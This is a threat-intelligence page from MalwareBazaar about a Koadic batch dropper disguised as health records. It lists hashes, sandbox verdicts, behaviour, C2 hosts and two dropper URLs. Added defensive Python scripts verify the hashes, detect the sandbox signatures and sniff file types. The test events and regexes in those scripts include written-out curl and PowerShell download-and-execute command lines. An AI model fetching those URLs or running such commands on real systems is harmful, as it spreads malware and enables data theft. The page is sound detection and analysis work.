MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Koadic


Vendor detections: 10



SHA256 hash: 9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8
SHA3-384 hash: 8fdf6c742c2782a870acb3d04bce1b48a65a75c5c0b0a03d0850ffdfd3ebbd412df9bd880526fada76e0f229456e5874
SHA1 hash: c9606dc57258fbae6585b89ec200dc8ced3c727b
MD5 hash: dee7e3e1fc5aab5e926dd255f0e26683
humanhash: juliet-glucose-pizza-cat
File name: health-records-26153-x-ray-pdl.bat
Signature: Koadic
File size: 3'833'483 bytes
First seen: 2026-03-16 19:18:46 UTC
Last seen: Never
File type: Batch (bat)
MIME type: text/plain
ssdeep: 3072:mSZx139tizBoRn+7qNnsHcs6nNFiKWOCwd8cIUpVTW4C3/RVjpDyd8vy6Bme/0vc:nq
TLSH: T1600640442DBB5ECD288B4236D3274E11BDEAF63C687E2D19D57CB93E7D04A1E0084A76
Magika: autohotkey
Reporter: smica83
Tags: bat Koadic
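The identifiers above are how this sample is referenced everywhere else; before trusting a local copy, confirm it is the same bytes. The Python below is an added example, not MalwareBazaar's own code: it streams a file once through all four hash functions listed in the entry and compares the results with the entry's values and file size. The file path is an assumption; ssdeep and TLSH need third-party libraries and are not computed here.

```python
"""Check a local copy of the sample against the identifiers in this entry.

Added example, not MalwareBazaar code. The file path in main() is an
assumption; ssdeep and TLSH need third-party libraries and are not computed.
"""
import hashlib
import hmac
import sys

# Values copied from the entry above (hex digests, lower case).
ENTRY_HASHES = {
    "sha256": "9b7d54dcc3e0b9981f015187abe400d3884ca3007a6502ca7ddb3792496edfd8",
    "sha3_384": "8fdf6c742c2782a870acb3d04bce1b48a65a75c5c0b0a03d0850ffdfd3ebbd412df9bd880526fada76e0f229456e5874",
    "sha1": "c9606dc57258fbae6585b89ec200dc8ced3c727b",
    "md5": "dee7e3e1fc5aab5e926dd255f0e26683",
}
ENTRY_SIZE = 3_833_483  # "File size" from the entry


def digests(chunks):
    """Feed every chunk to all four hash objects in one pass (the sample is ~3.8 MB,
    so it is read once, not once per algorithm). Returns (hex digests, byte count)."""
    hashers = {name: hashlib.new(name) for name in ENTRY_HASHES}
    size = 0
    for chunk in chunks:
        size += len(chunk)
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}, size


def matches_entry(chunks):
    """Compare computed digests and size with the entry. hmac.compare_digest is used
    so the comparison does not short-circuit on the first differing character."""
    got, size = digests(chunks)
    result = {name: hmac.compare_digest(got[name], ENTRY_HASHES[name]) for name in ENTRY_HASHES}
    result["size"] = size == ENTRY_SIZE
    return result


def check_file(path, chunk_size=1 << 20):
    """Stream a file from disk; returns the per-identifier match table."""
    with open(path, "rb") as fh:
        return matches_entry(iter(lambda: fh.read(chunk_size), b""))


if __name__ == "__main__":
    # Assumed path: the .bat extracted from the MalwareBazaar zip inside an isolated analysis VM.
    target = sys.argv[1] if len(sys.argv) > 1 else "health-records-26153-x-ray-pdl.bat"
    for name, ok in check_file(target).items():
        print(f"{name:9s} {'match' if ok else 'MISMATCH'}")
```

Run it against the extracted file inside the analysis VM; any MISMATCH line means the copy is not the object this entry describes, regardless of what the file is named.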

Intelligence


File Origin
# of uploads: 1
# of downloads: 83
Origin country: HU
Vendor Threat Intelligence

No detections

Malware family: n/a
ID: 1
File name: health-records-26153-x-ray-pdl.bat
Verdict: Malicious activity
Analysis date: 2026-03-16 08:50:34 UTC
Tags: github arch-doc python

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample.

Verdict: Malicious
Score: 92.5%
Tags: obfuscated autorun shell sage
Result
Verdict:
Malware
Maliciousness:

Behaviour
Launching a process
Creating a file
Creating a file in the system32 directory
Running batch commands
Creating synchronization primitives
Searching for synchronization primitives
DNS request
Connection attempt
Sending a custom TCP request
Sending an HTTP GET request
Creating a process from a recently created file
Moving a recently created file
Delayed reading of the file
Creating a process with a hidden window
Using the Windows Management Instrumentation requests
Reading critical registry keys
Searching for the window
Downloading the file
Launching a tool to kill processes
Launching a file downloaded from the Internet
Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: cmd find findstr lolbin
Result
Threat name: Koadic, Abobus Obfuscator
Detection: malicious
Classification: troj.expl.evad
Score: 100 / 100
Signature
Drops script or batch files to the startup folder
Excessive usage of taskkill to terminate processes
Found large BAT file
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Powershell drops PE file
Sigma detected: Curl Download And Execute Combination
Sigma detected: Drops script at startup location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses the Telegram API (likely for C&C communication)
Yara detected Abobus Obfuscator
Yara detected Koadic BAT payload
Behaviour
Behavior Graph (ID 1884509; sample health-records-26153-x-ray-...; start date 16/03/2026; architecture WINDOWS; score 100). The interactive graph itself did not survive extraction; the nodes and edges it carried are summarised below.

Top-level signatures: Malicious sample detected (through community Yara rule); Yara detected Abobus Obfuscator; Sigma detected: Drops script at startup location; 12 other signatures. Top-level network: api.telegram.org, script.google.com, 3 other IPs or domains (Uses the Telegram API, likely for C&C communication).

Process tree (started processes, with the files they dropped and the hosts they contacted):

cmd.exe
  signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
  powershell.exe
    network: raw.githubusercontent.com 185.199.108.133:443 (FASTLYUS, Netherlands), local ports 49694, 49695
    dropped: C:\Users\Public\Desktops\vcruntime140_1.dll (PE32+); C:\Users\Public\Desktops\vcruntime140.dll (PE32+); C:\Users\Public\Desktops\python312.dll (PE32+); 843 other files (108 malicious)
    python.exe
      network: api.telegram.org 149.154.166.110:443 (TELEGRAMRU, United Kingdom), local ports 49716, 49717; script.google.com 142.251.210.46:443 (GOOGLEUS, United States), local port 49736; ipinfo.io 34.117.59.81:443 (GOOGLE-AS-AP, United States), local port 49715
      dropped: C:\Users\user\...\xlLJKr5bHNrAthXY.dll (PE32+); C:\Users\user\...\Vb78Rx1Hbsz1v5hI.dll (PE32+)
      cmd.exe -> taskkill.exe (three such cmd.exe/taskkill.exe pairs; signature: Excessive usage of taskkill to terminate processes)
      11 other processes -> 9 other processes
    conhost.exe
  powershell.exe
    network: github.com 140.82.114.4:443 (GITHUBUS, United States), local ports 49692, 49693
    dropped: C:\Users\user\AppData\...\WindowSecuryt.bat (Unicode)
    signatures: Drops script or batch files to the startup folder; Suspicious execution chain found; Powershell drops PE file
    conhost.exe
  conhost.exe
  9 other processes
cmd.exe
  cmd.exe
    signature: Suspicious powershell command line found
    powershell.exe -> cmd.exe -> 3 other processes -> net1.exe, conhost.exe
    curl.exe
      dropped: C:\Users\user\AppData\Local\Temp\ut1s.bat (Unicode)
    net.exe -> net1.exe
    2 other processes -> conhost.exe
  powershell.exe
    cmd.exe
      cmd.exe
        signature: Suspicious powershell command line found
        curl.exe -> 127.0.0.1
        net.exe -> net1.exe
        powershell.exe -> conhost.exe
      2 other processes -> net1.exe
  net.exe -> net1.exe
  2 other processes
svchost.exe
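Several of the signatures above (Curl Download And Execute Combination, PowerShell DownloadFile, Drops script at startup location, Excessive usage of taskkill) are the kind of logic a detection engineer would want to reproduce over endpoint telemetry rather than only in a sandbox. The Python below is an added example, not Joe Sandbox's or the Sigma project's code: it runs four such checks over a handful of constructed Sysmon-style events (process creation and file creation) whose paths and command lines are modelled on the behaviour graph. The event schema, field names, timestamps and thresholds are assumptions.

```python
"""Sigma-style checks over endpoint telemetry, matching four of the
signatures listed above. Added example, not Joe Sandbox or Sigma code.

EVENTS is constructed: Sysmon-like records (id 1 = process create,
id 11 = file create) whose paths mimic the behaviour graph. The field
names, timestamps and thresholds are assumptions.
"""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    # curl fetches a ".png" from a code-hosting site and writes it to Temp as a .bat
    {"id": 1, "t": 0, "pid": 100, "ppid": 10, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -s -L https://example.invalid/raw/main/up-1s.png -o C:\Users\user\AppData\Local\Temp\ut1s.bat"},
    # the downloaded file is then run by a fresh cmd.exe
    {"id": 1, "t": 2, "pid": 101, "ppid": 10, "image": CMD,
     "cmd": r"cmd.exe /c C:\Users\user\AppData\Local\Temp\ut1s.bat"},
    # PowerShell download cradle
    {"id": 1, "t": 3, "pid": 102, "ppid": 10, "image": PS,
     "cmd": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('https://example.invalid/Document.zip','C:\Users\Public\Document.zip')"},
    # persistence: a .bat written into the user's Startup folder
    {"id": 11, "t": 4, "pid": 102, "ppid": 10, "image": PS,
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat"},
    # benign control: an ordinary cmd.exe with no indicators
    {"id": 1, "t": 5, "pid": 300, "ppid": 10, "image": CMD, "cmd": "cmd.exe /c dir"},
]
# a burst of taskkill launches a few seconds apart
EVENTS += [{"id": 1, "t": 10 + i, "pid": 200 + i, "ppid": 150,
            "image": r"C:\Windows\System32\taskkill.exe", "cmd": f"taskkill /F /IM target{i}.exe"}
           for i in range(6)]

CURL_OUTPUT = re.compile(r'\s(?:-o|--output)\s+"?([^\s"]+)', re.I)
PS_DOWNLOAD = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
STARTUP_SCRIPT = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:bat|cmd|vbs|js|ps1)$", re.I)


def image_name(ev):
    return ev["image"].rsplit("\\", 1)[-1].lower()


def curl_download_then_execute(events):
    """Correlate curl.exe -o/--output with any later process whose command line names that file."""
    hits, downloaded = [], {}
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["id"] != 1:
            continue
        if image_name(ev) == "curl.exe":
            m = CURL_OUTPUT.search(ev["cmd"])
            if m:
                downloaded[m.group(1).lower()] = ev["pid"]
        elif any(path in ev["cmd"].lower() for path in downloaded):
            hits.append(("curl_download_and_execute", ev["pid"]))
    return hits


def powershell_download(events):
    """Download cradle keywords on a powershell.exe / pwsh.exe command line."""
    return [("powershell_download", ev["pid"]) for ev in events
            if ev["id"] == 1 and image_name(ev) in ("powershell.exe", "pwsh.exe")
            and PS_DOWNLOAD.search(ev["cmd"])]


def script_dropped_to_startup(events):
    """File-create event for a script extension inside a Startup folder."""
    return [("drops_script_at_startup", ev["pid"]) for ev in events
            if ev["id"] == 11 and STARTUP_SCRIPT.search(ev["target"])]


def taskkill_burst(events, threshold=5, window=60):
    """Fire once if at least `threshold` taskkill.exe launches fall inside `window` seconds."""
    times = sorted(ev["t"] for ev in events if ev["id"] == 1 and image_name(ev) == "taskkill.exe")
    for i in range(len(times) - threshold + 1):
        if times[i + threshold - 1] - times[i] <= window:
            return [("excessive_taskkill", None)]
    return []


def run_detections(events):
    hits = []
    for rule in (curl_download_then_execute, powershell_download, script_dropped_to_startup, taskkill_burst):
        hits.extend(rule(events))
    return hits


if __name__ == "__main__":
    for rule, pid in run_detections(EVENTS):
        print(f"{rule:28s} pid={pid}")
```

The curl check is the only stateful one: it remembers every output path curl wrote and fires when a later process names that path, which is how the behaviour graph's curl.exe -> ut1s.bat -> cmd.exe chain would look in telemetry. The benign cmd.exe record is there to show the rules do not fire on an ordinary shell.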
Result
Malware family: n/a
Score: 10/10
Tags: defense_evasion execution spyware stealer
Behaviour
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Contacts third-party web service commonly abused for C2
Looks up external IP address via web service
Drops startup file
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Malware Config
Dropper Extraction:
https://github.com/ud-6/ut326/raw/main/up-1s.png
https://github.com/mh1-7/t326/raw/main/Document.zip
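The two dropper URLs above advertise a .png and a .zip, while the behaviour graph shows curl.exe writing a .bat into Temp that is then executed. Checking what a fetched object actually is, independent of the extension in its URL, is a cheap triage step. The Python below is an added example, not Triage's or this page's code: it sniffs leading bytes and script-like text in constructed payloads and flags extension/content mismatches. The byte strings, the hint list and the extension table are assumptions; nothing is downloaded.

```python
"""Does a fetched object match the extension its URL advertises?

Added example, not Triage's or the page's code. SAMPLES holds constructed
byte strings standing in for what a dropper URL might return; the hint
list and the extension table are assumptions.
"""
import posixpath
from urllib.parse import urlparse

# Leading-byte signatures for the container types a dropper is likely to claim.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"PK\x03\x04", "zip"),
    (b"MZ", "pe"),
    (b"%PDF", "pdf"),
]
# Tokens that commonly appear near the top of Windows batch / PowerShell droppers.
SCRIPT_HINTS = (b"@echo off", b"powershell", b"cmd /c", b"cmd.exe", b"curl ", b"%~dp0")
# What each URL extension is expected to contain.
EXPECTED = {"png": "png", "zip": "zip", "pdf": "pdf", "exe": "pe", "dll": "pe"}


def sniff(data):
    """Classify by leading bytes first, then by script-like text in the first 512 bytes."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    head = data[:512].lower()
    if any(hint in head for hint in SCRIPT_HINTS):
        return "script"
    return "unknown"


def url_extension(url):
    return posixpath.splitext(urlparse(url).path)[1].lstrip(".").lower()


def check(url, data):
    """Return (claimed kind, sniffed kind, mismatch). A mismatch is only asserted when the
    extension is one we know how to verify, so .bin or extensionless URLs are not flagged."""
    claimed = url_extension(url)
    actual = sniff(data)
    expected = EXPECTED.get(claimed)
    return claimed, actual, expected is not None and expected != actual


# Constructed stand-ins, not real downloads from these URLs.
SAMPLES = [
    ("https://github.com/ud-6/ut326/raw/main/up-1s.png",
     b"@echo off\r\nset a=pow\r\nset b=ershell\r\n%a%%b% -w hidden\r\n"),
    ("https://github.com/mh1-7/t326/raw/main/Document.zip", b"PK\x03\x04" + b"\x00" * 26),
    ("https://example.invalid/logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]


def triage(samples):
    """List (url, claimed, actual) for every sample whose content contradicts its extension."""
    flagged = []
    for url, data in samples:
        claimed, actual, bad = check(url, data)
        if bad:
            flagged.append((url, claimed, actual))
    return flagged


if __name__ == "__main__":
    for url, claimed, actual in triage(SAMPLES):
        print(f"{url}: advertised {claimed}, sniffed {actual}")
```

The magic check runs before the text heuristic on purpose: a real PNG or ZIP can legitimately contain the word "powershell" somewhere in its body, so leading bytes decide first and the hint scan only runs on objects with no recognised header.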
Please note that we are no longer able to provide a coverage score for VirusTotal.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments